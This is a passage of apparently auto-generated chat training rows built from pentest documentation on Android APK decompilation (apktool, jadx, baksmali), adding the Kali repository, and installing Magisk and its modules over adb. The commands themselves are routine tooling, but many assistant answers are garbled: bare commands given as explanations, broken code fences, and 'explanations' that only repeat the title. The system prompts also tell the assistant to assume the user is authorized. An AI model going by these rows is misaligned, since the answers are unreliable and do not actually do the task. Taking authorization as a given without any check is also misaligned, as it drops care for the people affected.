non-free\" >> /etc/apt/sources.list \n\napt-get update", "metadata": {"corpus_index": 1585, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "echo"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for APK transform - Add Kali repo to your sources?"}, {"role": "assistant", "content": "echo \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list \n\napt-get update"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for APK transform - Add Kali repo to your sources?", "response": "echo \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list \n\napt-get update", "metadata": {"corpus_index": 1585, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `echo \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list`?"}, {"role": "assistant", "content": "This command is used for apk transform - add kali repo to your sources. Add Kali repo to your sources"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `echo \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list`?", "response": "This command is used for apk transform - add kali repo to your sources. Add Kali repo to your sources", "metadata": {"corpus_index": 1585, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use wget for apk transform - add kali repo to your sources?"}, {"role": "assistant", "content": "wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use wget for apk transform - add kali repo to your sources?", "response": "wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add", "metadata": {"corpus_index": 1586, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "wget"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on APK transform - Add Kali repo to your sources"}, {"role": "assistant", "content": "wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on APK transform - Add Kali repo to your sources", "response": "wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add", "metadata": {"corpus_index": 1586, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add`?"}, {"role": "assistant", "content": "This command is used for apk transform - add kali repo to your sources. Add Kali repo to your sources"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add`?", "response": "This command is used for apk transform - add kali repo to your sources. Add Kali repo to your sources", "metadata": {"corpus_index": 1586, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe APK transform - Install softwares in the context of penetration testing"}, {"role": "assistant", "content": "``\napt install unzip smali apktool dex2jar jadx\n`\n:::\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe APK transform - Install softwares in the context of penetration testing", "response": "``\napt install unzip smali apktool dex2jar jadx\n`\n:::\n\n``bash", "metadata": {"corpus_index": 1587, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do APK transform - Install softwares"}, {"role": "assistant", "content": "``\napt install unzip smali apktool dex2jar jadx\n`\n:::\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do APK transform - Install softwares", "response": "``\napt install unzip smali apktool dex2jar jadx\n`\n:::\n\n``bash", "metadata": {"corpus_index": 1587, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the apt command for apk transform - install softwares"}, {"role": "assistant", "content": "apt install unzip smali apktool dex2jar jadx"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the apt command for apk transform - install softwares", "response": "apt install unzip smali apktool dex2jar jadx", "metadata": {"corpus_index": 1588, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "apt"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on APK transform - Install softwares"}, {"role": "assistant", "content": "apt install unzip smali apktool dex2jar jadx"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on APK transform - Install softwares", "response": "apt install unzip smali apktool dex2jar jadx", "metadata": {"corpus_index": 1588, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `apt install unzip smali apktool dex2jar jadx`?"}, {"role": "assistant", "content": "This command is used for apk transform - install softwares. Install softwares"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `apt install unzip smali apktool dex2jar jadx`?", "response": "This command is used for apk transform - install softwares. Install softwares", "metadata": {"corpus_index": 1588, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Disassemble DEX in the context of penetration testing"}, {"role": "assistant", "content": "baksmali d ./application-unzipped/classes.dex -o ./application-unzipped/classes.dex.out/ 2>/dev/null"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Disassemble DEX in the context of penetration testing", "response": "baksmali d ./application-unzipped/classes.dex -o ./application-unzipped/classes.dex.out/ 2>/dev/null", "metadata": {"corpus_index": 1589, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Disassemble DEX"}, {"role": "assistant", "content": "baksmali d ./application-unzipped/classes.dex -o ./application-unzipped/classes.dex.out/ 2>/dev/null"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Disassemble DEX", "response": "baksmali d ./application-unzipped/classes.dex -o ./application-unzipped/classes.dex.out/ 2>/dev/null", "metadata": {"corpus_index": 1589, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Decompile .DEX files in the context of penetration testing"}, {"role": "assistant", "content": "jadx application.apk -j $(grep -c ^processor /proc/cpuinfo) -d ./application-jadx/ > /dev/null"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Decompile .DEX files in the context of penetration testing", "response": "jadx application.apk -j $(grep -c ^processor /proc/cpuinfo) -d ./application-jadx/ > /dev/null", "metadata": {"corpus_index": 1590, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Decompile .DEX files"}, {"role": "assistant", "content": "jadx application.apk -j $(grep -c ^processor /proc/cpuinfo) -d ./application-jadx/ > /dev/null"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Decompile .DEX files", "response": "jadx application.apk -j $(grep -c ^processor /proc/cpuinfo) -d ./application-jadx/ > /dev/null", "metadata": {"corpus_index": 1590, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Unpack the APK?"}, {"role": "assistant", "content": "apktool d application.apk -o ./application-unpacked/ \n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Unpack the APK?", "response": "apktool d application.apk -o ./application-unpacked/ \n```", "metadata": {"corpus_index": 1591, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Unpack the APK?"}, {"role": "assistant", "content": "apktool d application.apk -o ./application-unpacked/ \n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Unpack the APK?", "response": "apktool d application.apk -o ./application-unpacked/ \n```", "metadata": {"corpus_index": 1591, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Magisk - Theory"}, {"role": "assistant", "content": "> Magisk is a suite of open source software for customizing Android, supporting devices higher than Android 6.0.\\\n> Some highlight features:\n>\n> * MagiskSU: Provide root access for applications\n> * Magisk Modules: Modify read-only partitions by installing modules\n> * MagiskBoot: The most complete tool for unpacking and repacking Android boot images\n> * Zygisk: Run code in every Android applications' processes\n>\n> (Magisk GitHub repo)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Magisk - Theory", "response": "> Magisk is a suite of open source software for customizing Android, supporting devices higher than Android 6.0.\\\n> Some highlight features:\n>\n> * MagiskSU: Provide root access for applications\n> * Magisk Modules: Modify read-only partitions by installing modules\n> * MagiskBoot: The most complete tool for unpacking and repacking Android boot images\n> * Zygisk: Run code in every Android applications' processes\n>\n> (Magisk GitHub repo)", "metadata": {"corpus_index": 1592, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Magisk - Theory"}, {"role": "assistant", "content": "> Magisk is a suite of open source software for customizing Android, supporting devices higher than Android 6.0.\\\n> Some highlight features:\n>\n> * MagiskSU: Provide root access for applications\n> * Magisk Modules: Modify read-only partitions by installing modules\n> * MagiskBoot: The most complete tool for unpacking and repacking Android boot images\n> * Zygisk: Run code in every Android applications' processes\n>\n> (Magisk GitHub repo)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Magisk - Theory", "response": "> Magisk is a suite of open source software for customizing Android, supporting devices higher than Android 6.0.\\\n> Some highlight features:\n>\n> * MagiskSU: Provide root access for applications\n> * Magisk Modules: Modify read-only partitions by installing modules\n> * MagiskBoot: The most complete tool for unpacking and repacking Android boot images\n> * Zygisk: Run code in every Android applications' processes\n>\n> (Magisk GitHub repo)", "metadata": {"corpus_index": 1592, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Magisk - Install Magisk"}, {"role": "assistant", "content": "1. Download latest APK release at https://github.com/topjohnwu/Magisk/releases\n2. Install package on the phone\n\n``bash\nadb install \"Magisk-vXX.Y.apk\"\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Magisk - Install Magisk", "response": "1. Download latest APK release at https://github.com/topjohnwu/Magisk/releases\n2. Install package on the phone\n\n``bash\nadb install \"Magisk-vXX.Y.apk\"\n``", "metadata": {"corpus_index": 1593, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Magisk - Install Magisk?"}, {"role": "assistant", "content": "1. Download latest APK release at https://github.com/topjohnwu/Magisk/releases\n2. Install package on the phone\n\n``bash\nadb install \"Magisk-vXX.Y.apk\"\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Magisk - Install Magisk?", "response": "1. Download latest APK release at https://github.com/topjohnwu/Magisk/releases\n2. Install package on the phone\n\n``bash\nadb install \"Magisk-vXX.Y.apk\"\n``", "metadata": {"corpus_index": 1593, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the adb command to magisk - install magisk"}, {"role": "assistant", "content": "adb install \"Magisk-vXX.Y.apk\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the adb command to magisk - install magisk", "response": "adb install \"Magisk-vXX.Y.apk\"", "metadata": {"corpus_index": 1594, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "adb"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Magisk - Install Magisk?"}, {"role": "assistant", "content": "adb install \"Magisk-vXX.Y.apk\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Magisk - Install Magisk?", "response": "adb install \"Magisk-vXX.Y.apk\"", "metadata": {"corpus_index": 1594, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `adb install \"Magisk-vXX.Y.apk\"`?"}, {"role": "assistant", "content": "This command is used for magisk - install magisk. Install Magisk"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `adb install \"Magisk-vXX.Y.apk\"`?", "response": "This command is used for magisk - install magisk. Install Magisk", "metadata": {"corpus_index": 1594, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Magisk - Install Magisk modules?"}, {"role": "assistant", "content": "1. Download ZIP module (e.g. MagiskTrustUserCerts, MagiskHide, ...)\n2. Push the archive on the phone\n\n``bash\nadb push \"module.zip\" \"/sdcard/Download\"\n``\n\nOnce the archive is on the phone's storage, the module can be installed and enabled within the Magisk app\n\n* Magisk App --> Modules --> Install from storage --> Reboot\n* After reboot, enable the package"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Magisk - Install Magisk modules?", "response": "1. Download ZIP module (e.g. MagiskTrustUserCerts, MagiskHide, ...)\n2. Push the archive on the phone\n\n``bash\nadb push \"module.zip\" \"/sdcard/Download\"\n``\n\nOnce the archive is on the phone's storage, the module can be installed and enabled within the Magisk app\n\n* Magisk App --> Modules --> Install from storage --> Reboot\n* After reboot, enable the package", "metadata": {"corpus_index": 1595, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Magisk - Install Magisk modules"}, {"role": "assistant", "content": "1. Download ZIP module (e.g. MagiskTrustUserCerts, MagiskHide, ...)\n2. Push the archive on the phone\n\n``bash\nadb push \"module.zip\" \"/sdcard/Download\"\n``\n\nOnce the archive is on the phone's storage, the module can be installed and enabled within the Magisk app\n\n* Magisk App --> Modules --> Install from storage --> Reboot\n* After reboot, enable the package"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Magisk - Install Magisk modules", "response": "1. Download ZIP module (e.g. MagiskTrustUserCerts, MagiskHide, ...)\n2. Push the archive on the phone\n\n``bash\nadb push \"module.zip\" \"/sdcard/Download\"\n``\n\nOnce the archive is on the phone's storage, the module can be installed and enabled within the Magisk app\n\n* Magisk App --> Modules --> Install from storage --> Reboot\n* After reboot, enable the package", "metadata": {"corpus_index": 1595, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use adb for magisk - install magisk modules?"}, {"role": "assistant", "content": "adb push \"module.zip\" \"/sdcard/Download\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use adb for magisk - install magisk modules?", "response": "adb push \"module.zip\" \"/sdcard/Download\"", "metadata": {"corpus_index": 1596, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "adb"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Magisk - Install Magisk modules"}, {"role": "assistant", "content": "adb push \"module.zip\" \"/sdcard/Download\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Magisk - Install Magisk modules", "response": "adb push \"module.zip\" \"/sdcard/Download\"", "metadata": {"corpus_index": 1596, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `adb push \"module.zip\" \"/sdcard/Download\"`?"}, {"role": "assistant", "content": "This command is used for magisk - install magisk modules. Install Magisk modules"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `adb push \"module.zip\" \"/sdcard/Download\"`?", "response": "This command is used for magisk - install magisk modules. Install Magisk modules", "metadata": {"corpus_index": 1596, "category": "mobile", "source_file": "docs/src/mobile-apps/android/magisk.md", "page_title": "Magisk", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Android in the context of penetration testing"}, {"role": "assistant", "content": "Auditing Android apps usually requires to be able to \n\n* capture and handles requests generated by the phone (e.g. through a proxy like Burp)\n* communicate with the phone easily (\"android debug bridge\", a.k.a. ADB)\n* handle all sorts of data (i.e. memory, logs, cache, backups)\n\nThis could be done using a real rooted phone, or a simulated one (e.g. MobSF, Genymotion). \n\nSeveral tools allow to enumerate the attack surface of an APK (e.g. Drozer or AndroidManifest.xml showing exported services and features).\n\nAndroid pentesting can be time-consuming. A reading of decompiled files allows to understand the role of functions used (APK transformation), hooks can be placed during the execution of the application in order to bypass its original behaviour (i.e. Frida, Objection)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Android in the context of penetration testing", "response": "Auditing Android apps usually requires to be able to \n\n* capture and handles requests generated by the phone (e.g. through a proxy like Burp)\n* communicate with the phone easily (\"android debug bridge\", a.k.a. ADB)\n* handle all sorts of data (i.e. memory, logs, cache, backups)\n\nThis could be done using a real rooted phone, or a simulated one (e.g. MobSF, Genymotion). \n\nSeveral tools allow to enumerate the attack surface of an APK (e.g. Drozer or AndroidManifest.xml showing exported services and features).\n\nAndroid pentesting can be time-consuming. A reading of decompiled files allows to understand the role of functions used (APK transformation), hooks can be placed during the execution of the application in order to bypass its original behaviour (i.e. Frida, Objection).", "metadata": {"corpus_index": 1597, "category": "web", "source_file": "docs/src/mobile-apps/android.md", "page_title": "Android", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Android?"}, {"role": "assistant", "content": "Auditing Android apps usually requires to be able to \n\n* capture and handles requests generated by the phone (e.g. through a proxy like Burp)\n* communicate with the phone easily (\"android debug bridge\", a.k.a. ADB)\n* handle all sorts of data (i.e. memory, logs, cache, backups)\n\nThis could be done using a real rooted phone, or a simulated one (e.g. MobSF, Genymotion). \n\nSeveral tools allow to enumerate the attack surface of an APK (e.g. Drozer or AndroidManifest.xml showing exported services and features).\n\nAndroid pentesting can be time-consuming. A reading of decompiled files allows to understand the role of functions used (APK transformation), hooks can be placed during the execution of the application in order to bypass its original behaviour (i.e. Frida, Objection)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Android?", "response": "Auditing Android apps usually requires to be able to \n\n* capture and handles requests generated by the phone (e.g. through a proxy like Burp)\n* communicate with the phone easily (\"android debug bridge\", a.k.a. ADB)\n* handle all sorts of data (i.e. memory, logs, cache, backups)\n\nThis could be done using a real rooted phone, or a simulated one (e.g. MobSF, Genymotion). \n\nSeveral tools allow to enumerate the attack surface of an APK (e.g. Drozer or AndroidManifest.xml showing exported services and features).\n\nAndroid pentesting can be time-consuming. A reading of decompiled files allows to understand the role of functions used (APK transformation), hooks can be placed during the execution of the application in order to bypass its original behaviour (i.e. Frida, Objection).", "metadata": {"corpus_index": 1597, "category": "web", "source_file": "docs/src/mobile-apps/android.md", "page_title": "Android", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Android - Audits"}, {"role": "assistant", "content": "Auditing Android covers multiples domains.\n\n* Applications Storage\n * Presence of sensitive data inside files (API_KEY, secrets)\n * Presence of sensitive data inside backups\n * Presence of sensitive data inside logs\n * Presence of sensitive data inside cache\n * Presence of sensitive data inside memory\n* Communications\n * Certificate pinning\n * Audit communications between phone and backends\n* Auditing platforms\n * Applications permissions\n * Fragments injection\n * Webview's user input\n * Webview's methods\n * Object persistence\n * Instants Apps\n * Custom URLs"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Android - Audits", "response": "Auditing Android covers multiples domains.\n\n* Applications Storage\n * Presence of sensitive data inside files (API_KEY, secrets)\n * Presence of sensitive data inside backups\n * Presence of sensitive data inside logs\n * Presence of sensitive data inside cache\n * Presence of sensitive data inside memory\n* Communications\n * Certificate 